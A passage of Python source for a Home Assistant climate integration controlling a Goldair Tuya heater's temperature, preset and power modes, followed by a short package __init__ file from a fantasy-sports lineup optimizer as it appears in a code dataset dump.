if self._device.model == "GECO270":
return PROPERTY_TO_DPS_ID_GECO270
else:
return PROPERTY_TO_DPS_ID
@property
def supported_features(self):
"""Return the list of supported features."""
return self._support_flags
@property
def should_poll(self):
"""Return the polling state."""
return True
@property
def name(self):
"""Return the name of the climate device."""
return self._device.name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return self._device.temperature_unit
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
if self.preset_mode == STATE_COMFORT:
return self._device.get_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE])
elif self.preset_mode == STATE_ECO:
return self._device.get_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE])
else:
return None
@property
def target_temperature_step(self):
"""Return the supported step of target temperature."""
return self._TEMPERATURE_STEP
@property
def min_temp(self):
"""Return the minimum temperature."""
if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE:
return self._TEMPERATURE_LIMITS[self.preset_mode]['min']
else:
return None
@property
def max_temp(self):
"""Return the maximum temperature."""
if self.preset_mode and self.preset_mode != STATE_ANTI_FREEZE:
return self._TEMPERATURE_LIMITS[self.preset_mode]['max']
else:
return None
def set_temperature(self, **kwargs):
"""Set new target temperatures."""
if kwargs.get(ATTR_PRESET_MODE) is not None:
self.set_preset_mode(kwargs.get(ATTR_PRESET_MODE))
if kwargs.get(ATTR_TEMPERATURE) is not None:
self.set_target_temperature(kwargs.get(ATTR_TEMPERATURE))
def set_target_temperature(self, target_temperature):
target_temperature = int(round(target_temperature))
preset_mode = self.preset_mode
if preset_mode == STATE_ANTI_FREEZE:
raise ValueError('You cannot set the temperature in Anti-freeze mode.')
limits = self._TEMPERATURE_LIMITS[preset_mode]
if not limits['min'] <= target_temperature <= limits['max']:
raise ValueError(
f'Target temperature ({target_temperature}) must be between '
f'{limits["min"]} and {limits["max"]}'
)
if preset_mode == STATE_COMFORT:
self._device.set_property(self.get_property_to_dps_id[ATTR_TARGET_TEMPERATURE], target_temperature)
elif preset_mode == STATE_ECO:
self._device.set_property(self.get_property_to_dps_id[ATTR_ECO_TARGET_TEMPERATURE], target_temperature)
@property
def current_temperature(self):
"""Return the current temperature."""
return self._device.get_property(self.get_property_to_dps_id[ATTR_TEMPERATURE])
@property
def hvac_mode(self):
"""Return current HVAC mode, ie Heat or Off."""
dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_HVAC_MODE])
if dps_mode is not None:
return GoldairTuyaDevice.get_key_for_value(HVAC_MODE_TO_DPS_MODE, dps_mode)
else:
return STATE_UNAVAILABLE
@property
def hvac_modes(self):
"""Return the list of available HVAC modes."""
return list(HVAC_MODE_TO_DPS_MODE.keys())
def set_hvac_mode(self, hvac_mode):
"""Set new HVAC mode."""
dps_mode = HVAC_MODE_TO_DPS_MODE[hvac_mode]
self._device.set_property(self.get_property_to_dps_id[ATTR_HVAC_MODE], dps_mode)
@property
def preset_mode(self):
"""Return current preset mode, ie Comfort, Eco, Anti-freeze."""
dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_PRESET_MODE])
keys = list(self.get_property_to_dps_id)
if dps_mode not in keys:
_LOGGER.debug(f'Could not load correct preset mode from api status. Defaulting to Comfort')
_LOGGER.debug(f'dps_mode was: {dps_mode}, PROPERTY_TO_DPS_ID was: {json.dumps(self.get_property_to_dps_id)}')
dps_mode = 'C'
if dps_mode is not None:
return GoldairTuyaDevice.get_key_for_value(PRESET_MODE_TO_DPS_MODE, dps_mode)
else:
return None
@property
def preset_modes(self):
"""Return the list of available preset modes."""
return list(PRESET_MODE_TO_DPS_MODE.keys())
def set_preset_mode(self, preset_mode):
"""Set new preset mode."""
dps_mode = PRESET_MODE_TO_DPS_MODE[preset_mode]
self._device.set_property(self.get_property_to_dps_id[ATTR_PRESET_MODE], dps_mode)
@property
def swing_mode(self):
"""Return the power level."""
dps_mode = self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_MODE])
if dps_mode == ATTR_POWER_MODE_USER:
return self._device.get_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL])
elif dps_mode == ATTR_POWER_MODE_AUTO:
return GoldairTuyaDevice.get_key_for_value(POWER_LEVEL_TO_DPS_LEVEL, dps_mode)
else:
return None
@property
def swing_modes(self):
"""List of power levels."""
return list(POWER_LEVEL_TO_DPS_LEVEL.keys())
def set_swing_mode(self, swing_mode):
"""Set new power level."""
new_level = swing_mode
if new_level not in POWER_LEVEL_TO_DPS_LEVEL.keys():
raise ValueError(f'Invalid power level: {new_level}')
dps_level = POWER_LEVEL_TO_DPS_LEVEL[new_level]
self._device.set_property(self.get_property_to_dps_id[ATTR_POWER_LEVEL], dps_level)
def update(self):
self._device.refresh()
| 2.203125 | 2 |
pydfs_lineup_optimizer/sites/draftstarsnfl/__init__.py | apapadimitriou/pydfs-lineup-optimizer | 0 | 12797550 | <filename>pydfs_lineup_optimizer/sites/draftstarsnfl/__init__.py
from .importer import *
from .settings import *
__all__ = [
'DraftstarsCSVImporter', 'DraftstarsNFLSettings'
] | 1.210938 | 1 |
Subsets and Splits